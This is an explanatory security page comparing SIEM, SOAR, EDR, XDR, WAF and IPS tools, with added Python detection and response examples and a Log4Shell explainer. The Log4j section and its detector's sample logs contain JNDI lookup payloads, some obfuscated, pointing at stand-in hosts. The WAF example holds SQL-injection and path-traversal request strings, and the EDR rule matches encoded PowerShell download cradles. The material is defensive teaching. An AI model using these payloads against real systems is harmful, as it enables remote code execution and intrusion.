XDR EDR SOAR and SIEM

Various topics related to Cybersecurity.

XDR vs EDR vs SOAR vs SIEM

Definitions on tools / services commonly used for cybersecurity.

SIEM

Combining security information management (SIM) and security event management (SEM), security information and event management (SIEM) offers real-time monitoring and analysis of events as well as tracking and logging of security data for compliance or auditing purposes.

A SIEM is a security solution that helps an organization recognize potential threats and vulnerabilities before they disrupt business operations. It surfaces anomalies in user behaviour and, increasingly, uses analytics and machine learning to automate manual parts of threat detection and incident response. It has become a staple of the modern security operations centre (SOC) for both security and compliance use cases.

SIEM solutions perform some level of data aggregation, consolidation and sorting in order to identify threats and to meet data compliance requirements. Solutions vary in capability, but most offer the same core functionality:

  • Log Management
  • Event Correlation and Analytics
  • Incident Monitoring and Security Alerts
  • Compliance Management and Reporting

SIEM tools support threat detection, compliance and security incident management through the collection and analysis of security events and other contextual data (asset inventories, identity data, threat intelligence). The system tracks events and incidents across the whole IT infrastructure; the value comes from correlating events from different sources that individually look harmless.
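The following is an added example (not code from the page or from any SIEM product) of the log management and correlation functions listed above. It ingests two differently formatted sources, an sshd syslog line and a web portal's JSON audit event, normalizes both into one schema, then runs a single correlation rule: three or more failed logins from one source IP within five minutes, followed by a success from that IP. Neither source alone crosses the threshold in the constructed sample; only the combined view does. Log lines, hostnames and IPs are constructed.

```python
"""Minimal SIEM-style pipeline: normalize heterogeneous logs, then correlate.
Added example; the log lines below are constructed, not real data."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs: sshd syslog lines and a web portal's JSON audit events.
RAW_LOGS = [
    "2024-03-01T10:00:01Z host1 sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2",
    "2024-03-01T10:00:03Z host1 sshd[1201]: Failed password for root from 203.0.113.7 port 51023 ssh2",
    '{"ts":"2024-03-01T10:00:05Z","app":"portal","event":"login_failed","user":"alice","src_ip":"203.0.113.7"}',
    '{"ts":"2024-03-01T10:00:06Z","app":"portal","event":"login_failed","user":"bob","src_ip":"203.0.113.7"}',
    '{"ts":"2024-03-01T10:00:09Z","app":"portal","event":"login_ok","user":"bob","src_ip":"203.0.113.7"}',
    '{"ts":"2024-03-01T10:05:00Z","app":"portal","event":"login_failed","user":"carol","src_ip":"198.51.100.9"}',
    "2024-03-01T10:30:00Z host1 sshd[1300]: Accepted publickey for deploy from 198.51.100.9 port 40000 ssh2",
]

SSHD_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Failed password|Accepted \w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def normalize(line):
    """Map a raw line into the common schema: ts, source, user, src_ip, outcome."""
    if line.startswith("{"):
        d = json.loads(line)
        return {"ts": _ts(d["ts"]), "source": d["app"], "user": d["user"],
                "src_ip": d["src_ip"],
                "outcome": "fail" if d["event"] == "login_failed" else "success"}
    m = SSHD_RE.match(line)
    if not m:
        return None   # unknown format: a real SIEM routes this to a parse-failure queue
    return {"ts": _ts(m["ts"]), "source": f"sshd@{m['host']}", "user": m["user"],
            "src_ip": m["ip"],
            "outcome": "fail" if m["outcome"].startswith("Failed") else "success"}

def correlate(events, threshold=3, window=timedelta(minutes=5)):
    """Rule: >= threshold failures from one IP inside `window` (any source), then a
    success from that IP -> alert 'bruteforce_then_success'."""
    events = sorted((e for e in events if e), key=lambda e: e["ts"])
    fails = defaultdict(list)          # src_ip -> timestamps of recent failures
    alerts = []
    for e in events:
        ip = e["src_ip"]
        fails[ip] = [t for t in fails[ip] if e["ts"] - t <= window]   # slide the window
        if e["outcome"] == "fail":
            fails[ip].append(e["ts"])
        elif len(fails[ip]) >= threshold:
            alerts.append({"rule": "bruteforce_then_success", "src_ip": ip,
                           "failures": len(fails[ip]), "user": e["user"],
                           "source": e["source"], "ts": e["ts"].isoformat()})
            fails[ip].clear()          # one alert per burst, not one per later success
    return alerts

def run(lines=RAW_LOGS):
    return correlate(normalize(line) for line in lines)

if __name__ == "__main__":
    for alert in run():
        print(json.dumps(alert))
```

The rule fires once, for 203.0.113.7: two sshd failures plus two portal failures followed by a successful portal login as bob. The single failure from 198.51.100.9 has aged out of the window by the time its later SSH success arrives, so no alert is raised for it.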

SOAR

Security Orchestration, Automation and Response. SOAR is the remediation or other action taken, usually automatically, in response to an incident raised by a SIEM or another alert source. It is normally implemented as playbooks. Breaking the term down: security is the restriction of a system to its intended use and the protection of the confidentiality, integrity and availability of that system; orchestration is the automated configuration, coordination and management of computer systems and software; automation is technology by which a process or procedure is performed with minimal human assistance. Response is the complicated part in cybersecurity; we usually call it "incident response" or "incident handling".

Response

At the start of a response we often do not know whether we are dealing with an actual incident, so the first step after receiving a clue is validation and verification. That clue is either an alert (from the SIEM or another tool designed to notify) or a report, perhaps from a customer or an employee who noticed that something is not behaving as expected. Response, then, is the effort to perform initial verification, short-term mitigation, root-cause analysis, business continuity in the face of actual incidents, and long-term hardening of our systems so they are more resilient to the same class of issue.

SOAR technologies enable organizations to collect the inputs monitored by the security operations team, for example alerts from the SIEM, and to act on them through playbooks.

Example of SOAR in AWS

Some AWS native services that feed or act on a SOAR solution, as log sources, detection services or response targets:

  • Identity and Access Management (IAM)
  • Artifact
  • Audit Manager
  • Config
  • CloudFront
  • CloudTrail
  • CloudWatch
  • Detective
  • Directory Service
  • Firewall Manager
  • Cloud Directory
  • GuardDuty
  • Inspector
  • Macie
  • Network Firewall
  • Resource Access Manager (AWS RAM)
  • Secrets Manager
  • Security Hub
  • Shield
  • VPC Flow Logs
  • WAF

Logging is fundamental: without CloudTrail, VPC Flow Logs and application logs there is nothing to detect and nothing to review. The usual automation glue on AWS is an EventBridge rule (for example on a GuardDuty or Security Hub finding) that triggers a Lambda function or a Systems Manager Automation runbook. An example workflow to automate the response, for the scenario of a compromised EC2 instance or Lambda function:

  1. Isolate the instance (move an Auto Scaling instance to Standby, or swap its security groups for an empty quarantine group; for a Lambda function set reserved concurrency to 0). Do not stop or terminate it yet: that destroys memory contents and the attacker's live sessions, which are evidence.
  2. Snapshot the attached EBS volumes (or export the Lambda deployment package) and tag everything with the incident ID.
  3. Review: CloudTrail and VPC Flow Log entries for the instance role and its IPs, GuardDuty findings, and the snapshot.
  4. Decide whether it is a real compromise and what the blast radius is (which credentials the instance role held, what it could reach).
  5. Remediate: rotate the credentials, terminate and redeploy from a known-good image, and close the hole that let the attacker in.
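The workflow above as a plan-then-execute playbook, written here as an added example; it is not AWS's own code or a published runbook. The quarantine security group ID, instance ID and volume IDs are assumptions, and SAMPLE_INSTANCE is a constructed stand-in for one entry of ec2.describe_instances(). plan_quarantine() only builds the list of boto3 calls for steps 1 to 3, so it can be tested offline; execute() applies them, against a real client or the dry-run stand-in. Steps 4 and 5 are deliberately left to a human.

```python
"""SOAR playbook for a compromised EC2 instance: isolate -> snapshot -> tag for review.
Added example; IDs and the instance description below are constructed."""
from dataclasses import dataclass
from typing import Any

QUARANTINE_SG = "sg-0123456789abcdef0"   # assumption: a security group with no rules at all

@dataclass
class Action:
    api: str                # boto3 EC2 client method name
    params: dict[str, Any]  # keyword arguments for that method

def plan_quarantine(instance: dict, incident_id: str, quarantine_sg: str = QUARANTINE_SG):
    """Build the actions for one instance description (the shape of
    ec2.describe_instances()['Reservations'][i]['Instances'][j]).
    Isolation swaps security groups instead of calling stop_instances: stopping wipes
    volatile memory and the attacker's sessions before anyone has looked at them."""
    iid = instance["InstanceId"]
    current = {g["GroupId"] for g in instance.get("SecurityGroups", [])}
    actions = []
    if current != {quarantine_sg}:   # idempotent: re-running the playbook does not re-isolate
        # Caveat: security groups are stateful, so connections that are already
        # established keep working; a network ACL deny is needed to cut those.
        actions.append(Action("modify_instance_attribute",
                              {"InstanceId": iid, "Groups": [quarantine_sg]}))
    for bdm in instance.get("BlockDeviceMappings", []):   # one snapshot per EBS volume
        vol = bdm.get("Ebs", {}).get("VolumeId")
        if vol:
            actions.append(Action("create_snapshot", {
                "VolumeId": vol,
                "Description": f"forensic snapshot {incident_id} {iid}",
                "TagSpecifications": [{"ResourceType": "snapshot",
                                       "Tags": [{"Key": "incident", "Value": incident_id}]}]}))
    actions.append(Action("create_tags", {
        "Resources": [iid],
        "Tags": [{"Key": "incident", "Value": incident_id},
                 {"Key": "status", "Value": "quarantined-pending-review"}]}))
    return actions

class DryRunEC2:
    """Stand-in for a boto3 EC2 client: records the calls instead of making them."""
    def __init__(self):
        self.calls = []
    def __getattr__(self, name):
        def call(**params):
            self.calls.append((name, params))
            return {"DryRun": name}
        return call

def execute(actions, ec2=None):
    """Apply the plan. boto3 is imported lazily so the module loads without it."""
    if ec2 is None:
        import boto3   # real run: needs credentials with ec2:ModifyInstanceAttribute etc.
        ec2 = boto3.client("ec2")
    return [getattr(ec2, a.api)(**a.params) for a in actions]

# Constructed sample of a describe_instances() instance entry.
SAMPLE_INSTANCE = {
    "InstanceId": "i-0abc123def4567890",
    "SecurityGroups": [{"GroupId": "sg-web", "GroupName": "web"}],
    "BlockDeviceMappings": [
        {"DeviceName": "/dev/xvda", "Ebs": {"VolumeId": "vol-0root"}},
        {"DeviceName": "/dev/xvdb", "Ebs": {"VolumeId": "vol-0data"}},
    ],
}

if __name__ == "__main__":
    client = DryRunEC2()
    execute(plan_quarantine(SAMPLE_INSTANCE, "INC-1001"), ec2=client)
    for name, params in client.calls:
        print(name, params)
```

For the Lambda variant of step 1 the equivalent call is lambda.put_function_concurrency(FunctionName=..., ReservedConcurrentExecutions=0), which stops new invocations without deleting the function or its code.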

Third-party solutions such as Sumo Logic can also be deployed. The vendor describes its SOAR offering as providing:

  • Threat focus that leverages machine learning to reduce false positives and duplicate events
  • Orchestration that connects tools to fully automate incident response
  • Collaboration by automating incident lifecycle
  • Customizable reports and dashboards for visibility to KPIs

Endpoint Detection and Response

EDR is an endpoint security solution that combines real-time, continuous monitoring and collection of endpoint telemetry (process creation, file and registry changes, network connections, logins) with rules-based detection, analysis and automated response such as killing a process or isolating the host from the network.

There are two parts to EDR: proactive protection and reactive detection. The metric an EDR is trying to minimise is dwell time, the time between an attacker's initial foothold on a system or network and the moment the intrusion is detected.

Extended Detection and Response

XDR is an evolution of EDR with added capabilities such as automated enrichment and root-cause analysis, third-party integrations, internal and external threat intelligence feeds, and automated response. These are usually SaaS tools.

XDR solutions integrate more parts of the IT infrastructure, ingesting data from endpoints, identity providers, email, cloud workloads and network sensors. That lets them see the bigger picture: an incident is a set of related events that may span several parts of the infrastructure. This differs from a typical SIEM deployment, where alerts are raised separately by each source and it is left to the analyst (or to hand-written correlation rules) to notice that they all belong to the same attack.

Microsoft 365 Defender (now Microsoft Defender XDR) is an XDR solution that uses the individual Defender products for each part of the infrastructure (endpoint, identity, Office 365, cloud apps), all integrated into one incident view. It can still forward its incidents to a SIEM, and those incidents can be tied to a SOAR solution that remediates the threat automatically.
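An added example, not code from Microsoft or any XDR vendor, covering both the EDR and XDR sections above. The EDR part is one process-creation rule over constructed Sysmon-style telemetry (an Office application spawning a shell with an encoded command line). The XDR part stitches that alert together with constructed alerts from an identity provider and an email gateway: alerts that share an entity (user, host, IP, file hash) are merged into one incident by union-find, and an incident whose evidence crosses three sources is escalated even though each alert on its own is only low or medium severity. Hostnames, users, IPs and the hash are all constructed.

```python
"""EDR process rule feeding XDR-style incident stitching. Added example with constructed data."""
import re
from collections import defaultdict

SEV = ["low", "medium", "high"]

# --- EDR side: one detection rule over endpoint process telemetry -----------------
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
SUSPICIOUS_CMD = re.compile(r"(-enc\w*\s+[A-Za-z0-9+/=]{20,}|downloadstring|invoke-webrequest|\biex\b)", re.I)

def edr_rule(proc):
    """Flag Office -> shell with an encoded or download-cradle command line."""
    if (proc["parent"].lower() in OFFICE and proc["image"].lower() in SHELLS
            and SUSPICIOUS_CMD.search(proc["cmdline"])):
        return {"source": "edr", "title": "Office spawned shell with suspicious command line",
                "severity": "medium",
                "entities": {("host", proc["host"]), ("user", proc["user"])}}
    return None

# --- XDR side: group alerts from any source into incidents -------------------------
def stitch_incidents(alerts):
    """Union-find over alerts: any two alerts sharing an (type, value) entity join one incident."""
    parent = list(range(len(alerts)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    first_seen = {}                      # entity -> index of the first alert carrying it
    for i, a in enumerate(alerts):
        for ent in a["entities"]:
            if ent in first_seen:
                parent[find(i)] = find(first_seen[ent])
            else:
                first_seen[ent] = i

    groups = defaultdict(list)
    for i, a in enumerate(alerts):
        groups[find(i)].append(a)

    incidents = []
    for members in groups.values():
        sources = sorted({m["source"] for m in members})
        sev = max(members, key=lambda m: SEV.index(m["severity"]))["severity"]
        if len(sources) >= 3:            # email -> identity -> endpoint chain: escalate
            sev = "high"
        incidents.append({"alerts": members, "sources": sources, "severity": sev,
                          "entities": set().union(*(m["entities"] for m in members))})
    return incidents

# Constructed Sysmon-like process creation events.
PROC_EVENTS = [
    {"host": "WS-042", "user": "alice", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "WS-042", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]
# Constructed alerts from the identity and email sensors.
OTHER_ALERTS = [
    {"source": "identity", "title": "Sign-in from unfamiliar country", "severity": "low",
     "entities": {("user", "alice"), ("ip", "203.0.113.50")}},
    {"source": "email", "title": "Phishing attachment delivered", "severity": "medium",
     "entities": {("user", "alice"), ("sha256", "0" * 64)}},
    {"source": "identity", "title": "Password spray", "severity": "medium",
     "entities": {("user", "svc-backup"), ("ip", "198.51.100.77")}},
]

def run():
    edr_alerts = [a for a in (edr_rule(p) for p in PROC_EVENTS) if a]
    return stitch_incidents(edr_alerts + OTHER_ALERTS)

if __name__ == "__main__":
    for inc in run():
        print(inc["severity"], inc["sources"], [a["title"] for a in inc["alerts"]])
```

Fed the same four alerts, a SIEM without a correlation rule keyed on the user would show three unrelated medium and low alerts for alice; the stitching produces one high-severity incident for her and a separate medium one for the password spray against svc-backup.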

Managed Detection and Response

MDR is a managed service rather than a product: a provider operates the EDR and XDR tooling on the customer's behalf, monitors the resulting logs and findings around the clock, triages them, and either executes responses (through SOAR automation or manual playbooks) or recommends them to the customer. MDR providers also draw on network analysis and visibility (NAV) tools, network traffic analysis (NTA) and security log data.

WAF vs Firewall vs IPS

A web application firewall (WAF) sits in front of a web application, sifts through its HTTP traffic and blocks requests that match attack patterns before they reach the application. This is different from a traditional network firewall, which filters at the network layer and drops traffic before it ever reaches the WAF.

A WAF focuses on threats carried in HTTP/HTTPS (layer 7 of the OSI model), whereas a traditional firewall sees all protocols but only at layer 3 (network) and layer 4 (transport): source and destination addresses, ports, protocol and connection state. Working at those layers, a network firewall does packet filtering and stateful connection tracking; a next-generation firewall adds deep packet inspection and application identification, but it still does not parse the request the way a WAF does.

Both WAFs and network firewalls can help against DDoS attacks, but at different layers: volumetric and SYN-flood style attacks at layers 3 and 4, request floods and slow-HTTP attacks at layer 7. WAF rule sets are built around the OWASP Top 10 web application risks, such as injection and cross-site scripting.

An intrusion prevention system (IPS) uses signatures to decide what to block: traffic is checked against a database of known-bad patterns (and sometimes an allowlist), and matching packets or sessions are dropped.

A WAF also uses signatures (the OWASP Core Rule Set is essentially a signature library), but it applies them after decoding the request as the application will see it (URL decoding, parameter parsing, cookie and session handling), and it can make decisions based on the user, the session or the part of the application the request targets, for example per-session rate limits or stricter rules on the login endpoint. An IPS matching raw bytes on the wire misses anything the encoding hides.
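An added example, not taken from any WAF or IPS product, that makes the difference concrete. ips_check() applies a naive SQL-injection byte signature to the raw request, the way a signature-only IPS would. Waf.check() first parses and URL-decodes the request (twice, because double-encoding is a standard way past single-decode filters), then applies an injection rule to each parameter, a path-traversal rule to the path, and a per-session rate limit keyed on the cookie. The HTTP requests are constructed; the rules are simplified stand-ins for real rule sets.

```python
"""Byte-signature (IPS-style) matching versus decode-then-inspect (WAF-style) matching.
Added example; the requests below are constructed."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Naive IPS signature applied to the bytes on the wire.
SQLI_RAW = re.compile(rb"'\s*or\s*1\s*=\s*1", re.I)

def ips_check(raw_request: bytes) -> bool:
    return SQLI_RAW.search(raw_request) is not None

# WAF rules applied to the decoded request.
SQLI_RULE = re.compile(r"""['"]\s*or\s+[\w'"]+\s*=\s*[\w'"]+""", re.I)
PATH_TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")

class Waf:
    def __init__(self, max_per_session=5):
        self.max_per_session = max_per_session
        self.hits = defaultdict(int)         # session cookie -> requests seen

    @staticmethod
    def normalize(raw: bytes):
        """Parse request line, headers, query string and form body; decode twice."""
        line, _, rest = raw.decode("latin-1").partition("\r\n")
        method, target, _ = line.split(" ", 2)
        head, _, body = rest.partition("\r\n\r\n")
        headers = dict(h.split(": ", 1) for h in head.split("\r\n") if h)   # sample headers all contain ': '
        parts = urlsplit(target)
        params = dict(parse_qsl(parts.query, keep_blank_values=True))      # first decode
        if method == "POST" and headers.get("Content-Type", "").startswith("application/x-www-form-urlencoded"):
            params.update(parse_qsl(body, keep_blank_values=True))
        path = unquote_plus(unquote_plus(parts.path))
        params = {k: unquote_plus(v) for k, v in params.items()}           # second decode (%2527 -> ')
        return {"method": method, "path": path, "params": params,
                "session": headers.get("Cookie", "")}

    def check(self, raw: bytes) -> str:
        req = self.normalize(raw)
        self.hits[req["session"]] += 1
        if self.hits[req["session"]] > self.max_per_session:
            return "block:rate-limit"
        if PATH_TRAVERSAL.search(req["path"]):
            return "block:path-traversal"
        for name, value in req["params"].items():
            if SQLI_RULE.search(value):
                return f"block:sqli:{name}"
        return "allow"

FORM = b"Content-Type: application/x-www-form-urlencoded"
REQUESTS = [   # constructed
    b"GET /login?user=admin&pass=x HTTP/1.1\r\nHost: app\r\nCookie: sid=s1\r\n\r\n",
    b"GET /login?user=admin'%20OR%201%3D1--&pass=x HTTP/1.1\r\nHost: app\r\nCookie: sid=s2\r\n\r\n",
    b"POST /login HTTP/1.1\r\nHost: app\r\nCookie: sid=s3\r\n" + FORM + b"\r\n\r\nuser=admin%2527%2520or%25201%253D1&pass=x",
    b"GET /static/..%2F..%2Fetc/passwd HTTP/1.1\r\nHost: app\r\nCookie: sid=s4\r\n\r\n",
    b"POST /login HTTP/1.1\r\nHost: app\r\nCookie: sid=s5\r\n" + FORM + b"\r\n\r\nuser=' or 1=1&pass=x",
]

def run(requests=REQUESTS):
    """Return (ips_verdict, waf_verdict) per request."""
    waf = Waf()
    return [(ips_check(r), waf.check(r)) for r in requests]

if __name__ == "__main__":
    for r, verdict in zip(REQUESTS, run()):
        print(r.split(b"\r\n", 1)[0].decode(), verdict)
```

Only the last, unencoded request trips the raw signature; the single- and double-encoded injections and the encoded traversal pass the IPS check and are caught by the WAF only because it decoded the request first. The rate limit shows the session-aware decision a byte matcher cannot make at all.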

AIOps and MLOps

Artificial Intelligence for IT Operations (AIOps) is a term coined by Gartner in 2016 as an industry category for machine-learning analytics technology that enhances IT operations analytics; Gartner originally expanded the acronym as "Algorithmic IT Operations". The operational tasks it covers include automation, performance monitoring and event correlation, among others.

An AIOps platform has two main aspects: machine learning and big data. Observational data (logs, metrics, traces) and engagement data (tickets, incidents) are collected into one big-data platform, which requires moving away from IT data that is segregated by team, and a holistic machine-learning and analytics strategy is applied to the combined data. The goal is to enable IT transformation and to receive continuous insights that drive continuous fixes and improvements via automation, which is why AIOps is sometimes described as CI/CD for core IT functions.

The normalized data can then be processed by machine-learning algorithms to reduce noise automatically and identify the probable root cause of incidents. The main output of this stage is the detection of abnormal behaviour by users, devices or applications.

Noise reduction can be done in various ways, but most research in the field points to the following steps:

  1. Analysis of all incoming alerts;
  2. Remove duplicates;
  3. Identify the false positives;
  4. Early anomaly, fault and failure (AFF) detection and analysis.

Anomaly detection, another step in any AIOps process, is based on the analysis of past behaviour of users, equipment and applications. Anything that strays from that baseline is considered unusual and flagged as abnormal. Root-cause determination is usually done by passing incoming alerts through algorithms that take correlated events and topology dependencies (which service depends on which) into account. The algorithms on which the AI bases its decisions can be influenced directly, essentially by training them.
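The noise-reduction steps and the anomaly and root-cause paragraph above, as one added example that is not from any AIOps product. dedupe() collapses repeated alerts with the same fingerprint inside a window (step 2); baseline_anomalies() flags current metric values that stray from each metric's history using a robust z-score built on the median and median absolute deviation, so past outliers do not inflate the baseline; root_cause() walks a dependency map to name the most upstream anomalous component. Alerts, metric history and the dependency map are constructed.

```python
"""Alert de-duplication, baseline anomaly detection and topology-aware root cause.
Added example with constructed data."""
import statistics

def dedupe(alerts, window=300):
    """Collapse alerts sharing a fingerprint (host, check) within `window` seconds of the
    first one seen; the kept alert carries a count of how many it absorbed."""
    first, kept = {}, []
    for a in sorted(alerts, key=lambda a: a["ts"]):
        fp = (a["host"], a["check"])
        if fp in first and a["ts"] - first[fp]["ts"] <= window:
            first[fp]["count"] += 1
            continue
        a = dict(a, count=1)
        first[fp] = a
        kept.append(a)
    return kept

def robust_z(history, value):
    """z-score against median/MAD instead of mean/std (0.6745 scales MAD to sigma)."""
    med = statistics.median(history)
    mad = statistics.median(abs(x - med) for x in history) or 1e-9   # avoid /0 on flat history
    return 0.6745 * (value - med) / mad

def baseline_anomalies(history, current, threshold=3.5):
    """history: {metric: [past samples]}, current: {metric: value} -> {metric: z} for outliers."""
    out = {}
    for metric, value in current.items():
        z = robust_z(history[metric], value)
        if abs(z) > threshold:
            out[metric] = round(z, 2)
    return out

def root_cause(anomalous, depends_on):
    """Of the anomalous components, keep those none of whose dependencies are anomalous:
    the most upstream failures. A downstream symptom (web errors) is explained by them."""
    return sorted(c for c in anomalous
                  if not any(d in anomalous for d in depends_on.get(c, ())))

ALERTS = [   # constructed; ts in seconds
    {"ts": 0,   "host": "web1", "check": "http_5xx"},
    {"ts": 60,  "host": "web1", "check": "http_5xx"},
    {"ts": 120, "host": "web1", "check": "http_5xx"},
    {"ts": 130, "host": "db1",  "check": "disk_io_wait"},
    {"ts": 900, "host": "web1", "check": "http_5xx"},   # outside the window: a new alert
]
HISTORY = {   # constructed past 5-minute samples per metric
    "web1.http_5xx_rate": [0.01, 0.02, 0.01, 0.03, 0.02, 0.01, 0.02, 0.02, 0.01, 0.02],
    "db1.io_wait_pct":    [5, 6, 5, 7, 6, 5, 6, 5, 6, 7],
    "cache1.hit_ratio":   [0.95, 0.96, 0.94, 0.95, 0.97, 0.95, 0.96, 0.95, 0.94, 0.96],
}
CURRENT = {"web1.http_5xx_rate": 0.25, "db1.io_wait_pct": 45, "cache1.hit_ratio": 0.95}
DEPENDS_ON = {"web1": ["db1", "cache1"], "db1": [], "cache1": []}   # constructed topology

def run():
    anomalies = baseline_anomalies(HISTORY, CURRENT)
    components = {metric.split(".")[0] for metric in anomalies}
    return {"alerts": dedupe(ALERTS), "anomalies": anomalies,
            "root_cause": root_cause(components, DEPENDS_ON)}

if __name__ == "__main__":
    result = run()
    print(len(result["alerts"]), "alerts after dedup;", result["anomalies"], "->", result["root_cause"])
```

Five raw alerts become three, both the web error rate and the database I/O wait are far outside their baselines while the cache is not, and because web1 depends on db1 the root cause reported is db1 rather than the web tier that paged first.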

MLOps or ML Ops is a set of practices that aims to deploy and maintain machine learning models in production reliably and efficiently. The word is a compound of "machine learning" and the continuous development practice of DevOps in the software field. Machine learning models are developed and tested in isolated experimental systems. When an algorithm is ready to be launched, MLOps is practised between data scientists, DevOps and machine-learning engineers to transition the algorithm to production systems. Similar to DevOps or DataOps approaches, MLOps seeks to increase automation and improve the quality of production models, while also focusing on business and regulatory requirements. While MLOps started as a set of best practices, it is slowly evolving into an independent approach to ML lifecycle management. MLOps applies to the entire lifecycle, from integration with model generation (software development lifecycle, continuous integration/continuous delivery), orchestration and deployment, to health, diagnostics, governance and business metrics. According to Gartner, MLOps is a subset of ModelOps: MLOps is focused on the operationalization of ML models, while ModelOps covers the operationalization of all types of AI models.

Log4j Exploit

A zero-day remote code execution vulnerability in Log4j 2, named "Log4Shell" (CVE-2021-44228), was found and reported to Apache by Alibaba's cloud security team on November 24, 2021, and became public on December 9, 2021. Affected services included Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ and Twitter. The Apache Software Foundation assigned Log4Shell the maximum CVSS severity rating of 10, as millions of servers were potentially vulnerable. Tenable characterized it as "the single biggest, most critical vulnerability of the last decade" and LunaSec's Free Wortley called it "a design failure of catastrophic proportions".

The Log4Shell vulnerability (CVE-2021-44228) was published on 10 December 2021 and affects versions 2.0-beta9 through 2.14.1 of the popular Log4j logging library for Java applications. It allows attackers to execute their own code on the target system and thus compromise the server. The fix is to upgrade: 2.15.0 turned out to be incomplete (CVE-2021-45046), so 2.17.1 or later is the safe target. Setting log4j2.formatMsgNoLookups=true (available from 2.10) was the interim mitigation, but it does not cover every configuration and is not a substitute for upgrading.

Attackers scan the internet for vulnerable servers and set up machines that deliver malicious payloads. To attack, they send requests to a service (for example a web server) crafted to trigger a log message (a 404 error, a failed login), with the malicious text placed in any field that gets logged, such as the User-Agent header or a username. The text is a Log4j lookup of the form ${jndi:ldap://attacker-host/a}: Log4j evaluates it, performs a JNDI lookup against the attacker's LDAP server, and loads the Java class that server points to.

That class can open a reverse shell, which gives the attacker remote control of the targeted server, or enrol the server in a botnet, a set of hijacked machines that carry out coordinated actions on the attacker's behalf. Because DNS is also a JNDI scheme, many scans first use a ${jndi:dns:} lookup pointing at a host the attacker controls purely to confirm the target is vulnerable, and only then send a real payload.
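An added example, not from Apache or any vendor, of detecting the probe strings described above in logged request fields. Scanners rarely send the literal ${jndi: text; they hide it behind Log4j's own nesting features, such as ${lower:j}ndi or ${::-j}${::-n}${::-d}${::-i}, which a plain substring match misses. The check below resolves the nesting forms most often used for evasion (lower/upper lookups and the ${lookup:key:-default} default syntax) before searching. This is a deliberate approximation of Log4j's lookup grammar, not its real resolver, and the access-log lines are constructed.

```python
"""Detect Log4Shell (CVE-2021-44228) probe strings, including nested-lookup evasions.
Added example; the log lines are constructed."""
import re

INNER = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...} with no nested braces

def resolve_lookup(body: str):
    """Approximate Log4j 2 lookup evaluation for the forms used in evasions."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${lookup:key:-default} -> default, e.g. ${::-j} -> j
        return body.split(":-", 1)[1]
    return None                           # unknown lookup: leave the text untouched

def normalize(s: str, max_rounds: int = 50) -> str:
    """Repeatedly collapse innermost lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = resolve_lookup(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNER.sub(sub, s)
        if not changed:
            break
    return s

JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)
SCHEME = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)

def is_log4shell_probe(field: str):
    """Return None, or a dict with the de-obfuscated text and the JNDI scheme used."""
    n = normalize(field)
    if not JNDI.search(n):
        return None
    m = SCHEME.search(n)
    return {"normalized": n, "scheme": m.group(1).lower() if m else "unknown"}

SAMPLE_LOGS = [   # constructed web access log lines: client, request, status, referer, user-agent
    '203.0.113.9 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /${${lower:j}ndi:${lower:l}dap://203.0.113.9/x} HTTP/1.1" 404 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.9/y}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.9/z}"',
    '198.51.100.4 - - [10/Dec/2021:12:00:06 +0000] "GET /docs?q=${version} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

def scan(lines=SAMPLE_LOGS):
    """(line index, scheme) for every line carrying a probe."""
    hits = []
    for i, line in enumerate(lines):
        r = is_log4shell_probe(line)
        if r:
            hits.append((i, r["scheme"]))
    return hits

if __name__ == "__main__":
    for i, scheme in scan():
        print(i, scheme, is_log4shell_probe(SAMPLE_LOGS[i])["normalized"])
```

Lines 1 to 4 are all reported, with the obfuscated forms collapsed to the same ${jndi:...} text a plain ${jndi: search would only catch on line 1; the harmless ${version} on the last line is not a lookup the resolver knows, so it is left alone and not flagged. The scheme is worth recording because dns callbacks usually mean reconnaissance while ldap and rmi mean a payload was attempted.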

LAPSUS$

Lapsus$ is an extortion group (data theft and leak threats rather than a ransomware family) responsible for multiple attacks on organisations worldwide.

On March 21, 2022, individuals from a group identifying themselves as Lapsus$ posted on a social media platform and alleged to have stolen source code from a number of United States-based technology companies. These unidentified individuals took credit for both the theft and dissemination of proprietary data that they claim to have illegally obtained. The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions.

https://www.fbi.gov/wanted/seeking-info/lapsus

References

https://en.wikipedia.org/wiki/Security_information_and_event_management

https://www.youtube.com/c/TheCISOPerspective

